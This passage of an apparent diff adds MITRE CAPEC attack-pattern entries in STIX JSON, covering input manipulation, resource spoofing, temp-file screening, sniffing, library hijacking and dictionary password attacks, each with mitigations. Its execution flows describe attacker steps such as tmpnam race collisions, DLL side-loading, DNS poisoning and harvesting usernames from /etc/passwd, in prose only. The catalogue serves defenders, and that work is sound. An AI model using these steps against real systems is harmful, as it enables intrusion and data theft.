"course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "spec_version": "2.1", + "target_ref": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target.", + "external_references": [ + { + "external_id": "CAPEC-153", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/153.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Input Data Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_prerequisites": [ + "The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.", + "external_references": [ + { + "external_id": "CAPEC-154", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Resource Location Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_prerequisites": [ + "None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor network activity to detect any anomalous or unauthorized communication exchanges.", + "id": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-154-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "spec_version": "2.1", + "target_ref": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.", + "external_references": [ + { + "external_id": "CAPEC-155", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/155.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Screen Temporary Files for Sensitive Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Look for temporary files in target application: An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information.

Experiment

  1. Attempt to read temporary files: An adversary will attempt to read any temporary files they may have discovered through normal means.

    2. Techniques
    Attempt to get the file by querying the file path to a web server
    Using a remote shell into an application, read temporary files and send out information remotely if necessary
    Recover temporary information from a user's browser cache

Exploit

  1. Use function weaknesses to gain access to temporary files: If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.

    2. Techniques
    Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.
    Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must utilize temporary files and must fail to adequately secure them against other parties reading them." + ], + "x_capec_resources_required": [ + "Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves.", + "external_references": [ + { + "external_id": "CAPEC-157", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + } + ], + "id": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Sniffing Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

    2. Techniques
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary positions themselves somewhere in the middle of the two components. If the communication is encrypted, the adversary will need to act as a proxy and route traffic between the components, exploiting a flaw in the encryption mechanism. Otherwise, the adversary can just observe the communication at either end.

    2. Techniques
    Use Wireshark or some other packet capturing tool to capture traffic on a network.
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Listen to Communication: The adversary observes communication, but does not alter or block it. The adversary gains access to sensitive information and can potentially utilize this information in a malicious way.

", + "x_capec_parent_of_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2", + "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4" + ], + "x_capec_prerequisites": [ + "The target data stream must be transmitted on a medium to which the adversary has access." + ], + "x_capec_resources_required": [ + "The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception.", + "id": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-157-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5d6642-3556-4d29-8f30-07ab3be9ab1a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "spec_version": "2.1", + "target_ref": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.", + "external_references": [ + { + "external_id": "CAPEC-158", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniffing Network Traffic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The target must be communicating on a network protocol visible by a network sniffing application.", + "The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication." + ], + "x_capec_resources_required": [ + "A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)." + ], + "x_capec_skills_required": { + "Low": "Adversaries can obtain and set up open-source network sniffing tools easily." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Obfuscate network traffic through encryption to prevent its readability by network sniffers.", + "id": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28658fd8-29a0-4a6b-b8a9-d7a967352c4e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "spec_version": "2.1", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ appropriate levels of segmentation to your network in accordance with best practices.", + "id": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1c000a2-67f9-4572-af06-6707542d5784", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "spec_version": "2.1", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.", + "external_references": [ + { + "external_id": "CAPEC-159", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/159.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "Silvio Cesare, Share Library Call Redirection Via ELF PLT Infection (Issue 56), Phrack Magazine, 2000", + "external_id": "REF-29", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/56/7.html" + }, + { + "description": "OWASP Top 10 2007 (2007), The Open Web Application Security Project (OWASP)", + "external_id": "REF-30", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-pdf-archive/OWASP_Top_10_2007.pdf" + } + ], + "id": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Redirect Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: The adversary identifies the target application and determines what libraries are being used.

    2. Techniques
    Find public source code and identify library dependencies.
    Gain access to the system hosting the application and look for libraries in common locations.

Experiment

  1. Deploy Malicious Libraries: The adversary crafts malicious libraries and deploys them on the system where the application is running, or in a remote location that can be loaded by the application.

Exploit

  1. Redirect Library Calls to Malicious Library: Once the malicious library crafted by the adversary is deployed, the adversary will manipulate the flow of the application such that it calls the malicious library. This can be done in a variety of ways based on how the application is loading and calling libraries.

    2. Techniques
    Poison the DNS cache of the system so that it loads a malicious library from a remote location hosted by the adversary instead of the legitimate location
    Create a symlink that tricks the application into thinking that a malicious library is the legitimate library.
    Use DLL side-loading to place a malicious verison of a DLL in the windows directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328" + ], + "x_capec_prerequisites": [ + "The target must utilize external libraries and must fail to verify the integrity of these libraries before using them." + ], + "x_capec_skills_required": { + "High": "To reverse engineering the libraries and inject malicious code into the libraries", + "Low": "To modify the entries in the configuration file pointing to malicious libraries", + "Medium": "To force symlink and timing issues for redirecting access to libraries" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Restrict the permission to modify the entries in the configuration file.", + "id": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd6337df-a7bd-4afe-b168-4189a828cafb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "spec_version": "2.1", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Check the integrity of the dynamically linked libraries before use them.", + "id": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34ed3417-5e22-490d-b967-b77e3be13f50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "spec_version": "2.1", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.", + "id": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--915e2bb6-c5cc-4d8c-b3f9-062b7c13ead4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.\n ", + "external_references": [ + { + "external_id": "CAPEC-16", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/16.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + } + ], + "id": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Dictionary-based Password Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A system user selects the word \"treacherous\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.", + "\n The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.\n Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.\n Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.See also: CVE-2003-1096" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Select dictionaries: Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)

    3. Techniques
    Select dictionary based on particular users' preferred languages.
    Select dictionary based on the application/system's supported languages.

  3. Determine username(s) to target: Determine username(s) whose passwords to crack.

    4. Techniques
    Obtain username(s) by sniffing network packets.
    Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)
    Obtain usernames from filesystem (e.g. list of directories in C:\\Documents and Settings\\ in Windows, and list in /etc/passwd in UNIX-like systems)

Exploit

  1. Use dictionary to crack passwords.: Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.

    2. Techniques
    Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).
    Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s).
